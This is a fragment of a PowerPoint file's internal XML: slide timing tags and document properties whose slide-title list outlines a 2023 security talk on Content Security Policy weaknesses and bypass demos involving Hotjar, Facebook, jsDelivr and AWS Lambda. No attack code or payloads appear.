<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="TIMING" val="|32.7|6.9|4"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag14.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="TIMING" val="|32"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag15.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="TIMING" val="|32"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag16.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="TIMING" val="|32"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag17.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="TIMING" val="|68.5"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag18.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="TIMING" val="|68.5"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag19.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="TIMING" val="|68.5"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag2.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="TIMING" val="|7.6|1.8|5.7"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag20.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="TIMING" val="|83.6|1.1"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag21.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="TIMING" val="|5.4"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag22.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="TIMING" val="|9"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag23.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="TIMING" val="|5.9|9.8"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag24.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="TIMING" val="|8.8|12.4"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag25.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="TIMING" val="|0.8"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag26.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="TIMING" val="|0.8|15.7"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag27.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="TIMING" val="|7.8"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag28.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="TIMING" val="|2|31.6"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag29.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="TIMING" val="|83.6|1.1"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag3.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="TIMING" val="|7.6|1.8|5.7"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag30.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="TIMING" val="|83.6|1.1"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag4.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="TIMING" val="|7.6|1.8|5.7"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag5.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="TIMING" val="|1.2|4.6|3.2|0.7"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag6.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="TIMING" val="|1.2"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag7.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="TIMING" val="|1.3"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag8.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="TIMING" val="|5.2"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag9.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 2013 - 2022</Template>
  <TotalTime>18993</TotalTime>
  <Words>4772</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>580</Paragraphs>
  <Slides>92</Slides>
  <Notes>35</Notes>
  <HiddenSlides>1</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Calibri Light</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>HACKED</vt:lpstr>
      <vt:lpstr>Helvetica</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Whoami</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Why Dress Code?</vt:lpstr>
      <vt:lpstr>Why Dress Code?</vt:lpstr>
      <vt:lpstr>What is CSP</vt:lpstr>
      <vt:lpstr>CSP Aimed to Tackle</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Feel old yet?</vt:lpstr>
      <vt:lpstr>How Does it Look?</vt:lpstr>
      <vt:lpstr>How Does it Look?</vt:lpstr>
      <vt:lpstr>How Does it Look?</vt:lpstr>
      <vt:lpstr>How Does it Look?</vt:lpstr>
      <vt:lpstr>How Does it Look?</vt:lpstr>
      <vt:lpstr>How Does it Look?</vt:lpstr>
      <vt:lpstr>I Have no Idea what I am Doing v2.0</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Dashboard Overview</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Dashboard Statistics</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Percentage of Sites Using CSP per Country</vt:lpstr>
      <vt:lpstr>Average Number of Weaknesses per Country</vt:lpstr>
      <vt:lpstr>Most Frequent Weaknesses</vt:lpstr>
      <vt:lpstr>Most Frequent Weaknesses - Top</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Most Frequent Weaknesses - Last</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Weaknesses to Explore</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Now what?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Bypasses</vt:lpstr>
      <vt:lpstr>To Be Published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 Hotjar</vt:lpstr>
      <vt:lpstr>Demo 1 Hotjar  Content-Security-Policy</vt:lpstr>
      <vt:lpstr>Demo 1 Hotjar  Content-Security-Policy</vt:lpstr>
      <vt:lpstr>Demo 1 Hotjar  Payload  Objective #1 – Security Answer</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Demo 1 Hotjar  Profit 💸</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Demo 2 Facebook</vt:lpstr>
      <vt:lpstr>Demo 2 Facebook  Content-Security-Policy</vt:lpstr>
      <vt:lpstr>Demo 2 Facebook  Content-Security-Policy</vt:lpstr>
      <vt:lpstr>Demo 2 Facebook  Payload  Objective #2 Method #1</vt:lpstr>
      <vt:lpstr>Demo 2 Facebook  Profit 💸</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Demo 3 JS Delivr</vt:lpstr>
      <vt:lpstr>Demo 3 – JS Delivr Storing the Payload (github.com or npmjs.com)</vt:lpstr>
      <vt:lpstr>Demo 3 JS Delivr  Profit 💸</vt:lpstr>
      <vt:lpstr>Demo 4 Amazon AWS  API Gateway + Lambda Function</vt:lpstr>
      <vt:lpstr>Demo 4 Amazon AWS  Lambda  Objective #2 – Secret Ingredient</vt:lpstr>
      <vt:lpstr>Demo 4 Amazon AWS  Lambda  Objective #2 – Secret Ingredient</vt:lpstr>
      <vt:lpstr>Demo 4 Amazon AWS  Payload  Objective #2 – Secret Ingredient</vt:lpstr>
      <vt:lpstr>Demo 4 Amazon AWS  Profit 💸</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PoC 5 and 6</vt:lpstr>
      <vt:lpstr>PoC 7 and 8</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Molina</dc:creator>
  <cp:lastModifiedBy>Felipe Molina de la Torre</cp:lastModifiedBy>
  <cp:revision>13</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-07-24T11:04:24Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-08-24T15:41:17Z</dcterms:modified>
</cp:coreProperties>
</file>